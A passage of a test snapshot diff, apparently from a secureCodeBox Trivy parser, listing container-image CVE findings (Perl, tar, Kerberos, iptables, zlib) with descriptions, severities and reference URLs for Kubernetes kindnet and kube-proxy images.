"location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "http://www.securityfocus.com/bid/49778", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", - ], - }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://github.com/chansen/p5-http-tiny/pull/153", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", - ], - }, - "category": "Vulnerability", - "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://github.com/chansen/p5-http-tiny/pull/153", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + }, + { + "type": "URL", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-1263-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9923", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", - "references": [ - "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", - "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", - "http://savannah.gnu.org/bugs/?55369", - "https://access.redhat.com/security/cve/CVE-2019-9923", - "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", - "https://ubuntu.com/security/notices/USN-4692-1", - "https://www.cve.org/CVERecord?id=CVE-2019-9923", - ], - }, - "category": "Vulnerability", - "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9923", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "http://savannah.gnu.org/bugs/?55369", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9923", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4692-1", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20193", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20193", - "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", - "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", - "https://savannah.gnu.org/bugs/?59897", - "https://security.gentoo.org/glsa/202105-29", - "https://ubuntu.com/security/notices/USN-5329-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20193", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: Memory leak in read_header() in list.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?59897", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-29", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5329-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - 